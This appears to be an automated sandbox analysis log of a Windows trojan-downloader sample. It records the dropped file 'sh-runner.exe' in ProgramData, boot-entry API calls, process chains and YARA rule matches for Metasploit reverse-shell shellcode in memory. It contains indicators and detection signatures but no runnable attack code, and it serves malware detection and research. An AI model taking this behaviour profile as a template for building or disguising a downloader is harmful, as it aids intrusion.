      Source: C:\ProgramData\sh-runner.exeCode function: 9_2_00000184BE574050 NtAddBootEntry,9_2_00000184BE574050
      Source: C:\ProgramData\sh-runner.exeCode function: 9_2_00000184BE573830 NtAddBootEntry,9_2_00000184BE573830
      Source: C:\ProgramData\sh-runner.exeCode function: 9_2_00000184BE5748A0 NtAddBootEntry,9_2_00000184BE5748A0
      Source: C:\ProgramData\sh-runner.exeCode function: 9_2_00000184BE5739E0 NtAddBootEntry,9_2_00000184BE5739E0
      Source: C:\ProgramData\sh-runner.exeCode function: 9_2_00000184BE5736F0 NtAddBootEntry,9_2_00000184BE5736F0
      Source: C:\ProgramData\sh-runner.exeCode function: 9_2_00000184BE573EF0 NtAddBootEntry,9_2_00000184BE573EF0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD12EB0: memcpy,DeviceIoControl,CloseHandle,CloseHandle,GetLastError,2_2_00007FF72BD12EB0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeCode function: 0_2_00007FF71C8C52E00_2_00007FF71C8C52E0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeCode function: 0_2_00007FF71C8C40E00_2_00007FF71C8C40E0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_3_000001FF24F7A71A2_3_000001FF24F7A71A
      Source: C:\ProgramData\sh-runner.exeCode function: 2_3_000001FF24F8764F2_3_000001FF24F8764F
      Source: C:\ProgramData\sh-runner.exeCode function: 2_3_000001FF24F70BDF2_3_000001FF24F70BDF
      Source: C:\ProgramData\sh-runner.exeCode function: 2_3_000001FF24F7876F2_3_000001FF24F7876F
      Source: C:\ProgramData\sh-runner.exeCode function: 2_3_000001FF24F8890B2_3_000001FF24F8890B
      Source: C:\ProgramData\sh-runner.exeCode function: 2_3_000001FF24F858AF2_3_000001FF24F858AF
      Source: C:\ProgramData\sh-runner.exeCode function: 2_3_000001FF24F7C13F2_3_000001FF24F7C13F
      Source: C:\ProgramData\sh-runner.exeCode function: 2_3_000001FF24F889372_3_000001FF24F88937
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD2ED082_2_00007FF72BD2ED08
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD04C602_2_00007FF72BD04C60
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCD8C902_2_00007FF72BCD8C90
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD34C222_2_00007FF72BD34C22
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD0AC002_2_00007FF72BD0AC00
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCE8B602_2_00007FF72BCE8B60
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCE0AE02_2_00007FF72BCE0AE0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD68B102_2_00007FF72BD68B10
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD56AE02_2_00007FF72BD56AE0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD04B002_2_00007FF72BD04B00
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD36AC52_2_00007FF72BD36AC5
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD50A602_2_00007FF72BD50A60
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD5AA002_2_00007FF72BD5AA00
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD5E9902_2_00007FF72BD5E990
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD0D0B02_2_00007FF72BD0D0B0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD46FD02_2_00007FF72BD46FD0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD54FA02_2_00007FF72BD54FA0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCF2F702_2_00007FF72BCF2F70
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCD2EF42_2_00007FF72BCD2EF4
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD66EC02_2_00007FF72BD66EC0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD48E902_2_00007FF72BD48E90
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCEEE802_2_00007FF72BCEEE80
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD34DCD2_2_00007FF72BD34DCD
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD1CDB02_2_00007FF72BD1CDB0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCD6D402_2_00007FF72BCD6D40
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCD24C02_2_00007FF72BCD24C0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD4C3A02_2_00007FF72BD4C3A0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD3831A2_2_00007FF72BD3831A
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD162C02_2_00007FF72BD162C0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD3A2012_2_00007FF72BD3A201
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD448802_2_00007FF72BD44880
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD4E8902_2_00007FF72BD4E890
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD648402_2_00007FF72BD64840
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD407702_2_00007FF72BD40770
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD4A7202_2_00007FF72BD4A720
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD5C6B02_2_00007FF72BD5C6B0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD4C6402_2_00007FF72BD4C640
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD206102_2_00007FF72BD20610
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD605F02_2_00007FF72BD605F0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCDA5A02_2_00007FF72BCDA5A0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCD85A02_2_00007FF72BCD85A0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCD25C02_2_00007FF72BCD25C0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCE85602_2_00007FF72BCE8560
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD17CAE2_2_00007FF72BD17CAE
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCF7C902_2_00007FF72BCF7C90
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCDDB402_2_00007FF72BCDDB40
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD23B302_2_00007FF72BD23B30
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCD9AD02_2_00007FF72BCD9AD0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD2FA6A2_2_00007FF72BD2FA6A
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD0FA402_2_00007FF72BD0FA40
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD63A202_2_00007FF72BD63A20
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCDBA102_2_00007FF72BCDBA10
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD619E02_2_00007FF72BD619E0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD4B9F02_2_00007FF72BD4B9F0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCFF9B02_2_00007FF72BCFF9B0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCFD9D02_2_00007FF72BCFD9D0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD499A02_2_00007FF72BD499A0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD3993A2_2_00007FF72BD3993A
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCEE0E02_2_00007FF72BCEE0E0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD300F02_2_00007FF72BD300F0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD680802_2_00007FF72BD68080
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD65FF02_2_00007FF72BD65FF0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD47F5A2_2_00007FF72BD47F5A
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD47F582_2_00007FF72BD47F58
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD13F702_2_00007FF72BD13F70
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD2BF202_2_00007FF72BD2BF20
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD5DED02_2_00007FF72BD5DED0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD49E1B2_2_00007FF72BD49E1B
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCD7E102_2_00007FF72BCD7E10
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD2DDE02_2_00007FF72BD2DDE0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD61DE02_2_00007FF72BD61DE0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD5FDD02_2_00007FF72BD5FDD0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD4BDD02_2_00007FF72BD4BDD0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCEB4402_2_00007FF72BCEB440
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCD93E02_2_00007FF72BCD93E0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD5B4102_2_00007FF72BD5B410
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD3F3402_2_00007FF72BD3F340
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD2B3402_2_00007FF72BD2B340
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCF13232_2_00007FF72BCF1323
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD4F1802_2_00007FF72BD4F180
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCF11502_2_00007FF72BCF1150
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCF18FA2_2_00007FF72BCF18FA
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD5D8402_2_00007FF72BD5D840
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD397542_2_00007FF72BD39754
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCD76E02_2_00007FF72BCD76E0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCF16AE2_2_00007FF72BCF16AE
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD296D02_2_00007FF72BD296D0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD3569B2_2_00007FF72BD3569B
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD116402_2_00007FF72BD11640
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD4B6502_2_00007FF72BD4B650
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD696502_2_00007FF72BD69650
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD495942_2_00007FF72BD49594
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD675902_2_00007FF72BD67590
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_000001FF24F9B7402_2_000001FF24F9B740
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_000001FF24F97D702_2_000001FF24F97D70
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_000001FF24FA4EB02_2_000001FF24FA4EB0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_000001FF24F901E02_2_000001FF24F901E0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_000001FF24F99D1B2_2_000001FF24F99D1B
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_000001FF24FA6C502_2_000001FF24FA6C50
      Source: C:\ProgramData\sh-runner.exeCode function: 4_3_00000112CF6A764F4_3_00000112CF6A764F
      Source: C:\ProgramData\sh-runner.exeCode function: 4_3_00000112CF69C13F4_3_00000112CF69C13F
      Source: C:\ProgramData\sh-runner.exeCode function: 4_3_00000112CF6A89374_3_00000112CF6A8937
      Source: C:\ProgramData\sh-runner.exeCode function: 4_3_00000112CF6A890B4_3_00000112CF6A890B
      Source: C:\ProgramData\sh-runner.exeCode function: 4_3_00000112CF690BDF4_3_00000112CF690BDF
      Source: C:\ProgramData\sh-runner.exeCode function: 4_3_00000112CF6A58AF4_3_00000112CF6A58AF
      Source: C:\ProgramData\sh-runner.exeCode function: 4_3_00000112CF69A71A4_3_00000112CF69A71A
      Source: C:\ProgramData\sh-runner.exeCode function: 4_3_00000112CF69876F4_3_00000112CF69876F
      Source: C:\ProgramData\sh-runner.exeCode function: 4_2_00000112CF6B7D704_2_00000112CF6B7D70
      Source: C:\ProgramData\sh-runner.exeCode function: 4_2_00000112CF6BB7404_2_00000112CF6BB740
      Source: C:\ProgramData\sh-runner.exeCode function: 4_2_00000112CF6B01E04_2_00000112CF6B01E0
      Source: C:\ProgramData\sh-runner.exeCode function: 4_2_00000112CF6C4EB04_2_00000112CF6C4EB0
      Source: C:\ProgramData\sh-runner.exeCode function: 4_2_00000112CF6B9D1B4_2_00000112CF6B9D1B
      Source: C:\ProgramData\sh-runner.exeCode function: 4_2_00000112CF6C6C504_2_00000112CF6C6C50
      Source: C:\ProgramData\sh-runner.exeCode function: 9_3_00000184BE54876F9_3_00000184BE54876F
      Source: C:\ProgramData\sh-runner.exeCode function: 9_3_00000184BE54A71A9_3_00000184BE54A71A
      Source: C:\ProgramData\sh-runner.exeCode function: 9_3_00000184BE540BDF9_3_00000184BE540BDF
      Source: C:\ProgramData\sh-runner.exeCode function: 9_3_00000184BE5558AF9_3_00000184BE5558AF
      Source: C:\ProgramData\sh-runner.exeCode function: 9_3_00000184BE55890B9_3_00000184BE55890B
      Source: C:\ProgramData\sh-runner.exeCode function: 9_3_00000184BE5589379_3_00000184BE558937
      Source: C:\ProgramData\sh-runner.exeCode function: 9_3_00000184BE54C13F9_3_00000184BE54C13F
      Source: C:\ProgramData\sh-runner.exeCode function: 9_3_00000184BE55764F9_3_00000184BE55764F
      Source: C:\ProgramData\sh-runner.exeCode function: 9_2_00000184BE56B7409_2_00000184BE56B740
      Source: C:\ProgramData\sh-runner.exeCode function: 9_2_00000184BE567D709_2_00000184BE567D70
      Source: C:\ProgramData\sh-runner.exeCode function: 9_2_00000184BE576C509_2_00000184BE576C50
      Source: C:\ProgramData\sh-runner.exeCode function: 9_2_00000184BE569D1B9_2_00000184BE569D1B
      Source: C:\ProgramData\sh-runner.exeCode function: 9_2_00000184BE5601E09_2_00000184BE5601E0
      Source: C:\ProgramData\sh-runner.exeCode function: 9_2_00000184BE574EB09_2_00000184BE574EB0
      Source: C:\ProgramData\sh-runner.exeCode function: String function: 00007FF72BD53A40 appears 124 times
      Source: C:\ProgramData\sh-runner.exeCode function: String function: 00007FF72BD53C98 appears 42 times
      Source: C:\ProgramData\sh-runner.exeCode function: String function: 00007FF72BD597B0 appears 64 times
      Source: C:\ProgramData\sh-runner.exeCode function: String function: 00007FF72BD6AA38 appears 77 times
      Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeStatic PE information: Number of sections : 19 > 10
      Source: 00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
      Source: 00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000002.00000002.3055198846.000001FF22F90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
      Source: 00000002.00000002.3055198846.000001FF22F90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000004.00000002.3055112919.00000112CF4C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
      Source: 00000004.00000002.3055112919.00000112CF4C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: classification engineClassification label: mal96.troj.evad.winEXE@9/5@0/1
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD153E0 memset,FormatMessageW,GetLastError,2_2_00007FF72BD153E0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD23490 CreateToolhelp32Snapshot,memset,Module32FirstW,Module32NextW,UnmapViewOfFile,CloseHandle,UnmapViewOfFile,CloseHandle,CloseHandle,2_2_00007FF72BD23490
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sh-runner[1].exeJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3492:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2720:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6900:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_03
      Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeReversingLabs: Detection: 39%
      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe"
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeProcess created: C:\ProgramData\sh-runner.exe "C:\ProgramData\sh-runner.exe"
      Source: C:\ProgramData\sh-runner.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\ProgramData\sh-runner.exe "C:\ProgramData\sh-runner.exe"
      Source: C:\ProgramData\sh-runner.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\ProgramData\sh-runner.exe "C:\ProgramData\sh-runner.exe"
      Source: C:\ProgramData\sh-runner.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeProcess created: C:\ProgramData\sh-runner.exe "C:\ProgramData\sh-runner.exe" Jump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: userenv.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: wininet.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: wldp.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: profapi.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: netutils.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: schannel.dllJump to behavior
